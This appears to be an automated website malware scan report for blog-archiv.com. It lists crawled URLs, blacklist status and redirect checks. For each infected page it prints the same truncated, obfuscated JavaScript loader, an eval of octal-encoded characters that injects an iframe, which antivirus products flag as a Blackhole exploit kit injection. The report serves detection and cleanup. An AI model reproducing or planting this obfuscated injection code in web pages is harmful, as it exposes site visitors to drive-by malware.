Malware Scanner report for blog-archiv.com

Malicious/Suspicious/Total urls checked: 7/0/15

7 pages have malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "blog-archiv.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=blog-archiv.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://blog-archiv.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://blog-archiv.com/	200 OK Content-Length: 10217 Content-Type: text/html	clean
http://blog-archiv.com/test/fcgi/test.html	200 OK Content-Length: 5881 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 ... 1606 bytes are skipped ...,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0155,0162,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0155,0162,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+493!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)} Antivirus reports: McAfee-GW-Edition JS/Exploit-Blacole.gc DrWeb Exploit.BlackHole.166 McAfee JS/Exploit-Blacole.gc AVG HTML/Framer
http://blog-archiv.com/test/fcgi/../../index.html	200 OK Content-Length: 10217 Content-Type: text/html	clean
http://blog-archiv.com/test/fcgi/../../test/fcgi/test.html	200 OK Content-Length: 5881 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 ... 1606 bytes are skipped ...,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0155,0162,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0155,0162,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+493!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)} Antivirus reports: McAfee-GW-Edition JS/Exploit-Blacole.gc DrWeb Exploit.BlackHole.166 McAfee JS/Exploit-Blacole.gc AVG HTML/Framer
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../index.html	200 OK Content-Length: 10217 Content-Type: text/html	clean
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/test.html	200 OK Content-Length: 5881 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 ... 1606 bytes are skipped ...,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0155,0162,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0155,0162,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+493!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)} Antivirus reports: McAfee-GW-Edition JS/Exploit-Blacole.gc DrWeb Exploit.BlackHole.166 McAfee JS/Exploit-Blacole.gc AVG HTML/Framer
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html	200 OK Content-Length: 10217 Content-Type: text/html	clean
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/test.html	200 OK Content-Length: 5881 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 ... 1606 bytes are skipped ...,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0155,0162,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0155,0162,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+493!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)} Antivirus reports: McAfee-GW-Edition JS/Exploit-Blacole.gc DrWeb Exploit.BlackHole.166 McAfee JS/Exploit-Blacole.gc AVG HTML/Framer
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html	200 OK Content-Length: 10217 Content-Type: text/html	clean
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/test.html	200 OK Content-Length: 5881 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 ... 1606 bytes are skipped ...,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0155,0162,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0155,0162,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+493!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)} Antivirus reports: McAfee-GW-Edition JS/Exploit-Blacole.gc DrWeb Exploit.BlackHole.166 McAfee JS/Exploit-Blacole.gc AVG HTML/Framer
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html	200 OK Content-Length: 10217 Content-Type: text/html	clean
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/test.html	200 OK Content-Length: 5881 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 ... 1606 bytes are skipped ...,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0155,0162,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0155,0162,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+493!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)} Antivirus reports: McAfee-GW-Edition JS/Exploit-Blacole.gc DrWeb Exploit.BlackHole.166 McAfee JS/Exploit-Blacole.gc AVG HTML/Framer
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html	200 OK Content-Length: 10217 Content-Type: text/html	clean
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/test.html	200 OK Content-Length: 5881 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 ... 1606 bytes are skipped ...,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0155,0162,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0155,0162,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+493!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)} Antivirus reports: McAfee-GW-Edition JS/Exploit-Blacole.gc DrWeb Exploit.BlackHole.166 McAfee JS/Exploit-Blacole.gc AVG HTML/Framer
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html	200 OK Content-Length: 10217 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: blog-archiv.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 15 May 2014 14:58:15 GMT
Accept-Ranges: bytes
ETag: "15700be-27e9-4d8c0f97ecd80"
Server: Apache
Content-Length: 10217
Content-Type: text/html
Last-Modified: Mon, 25 Mar 2013 14:53:58 GMT
MS-Author-Via: DAV
X-Powered-By: PleskLin

...10217 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: blog-archiv.com
Referer: http://www.google.com/search?q=blog-archiv.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for blog-archiv.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools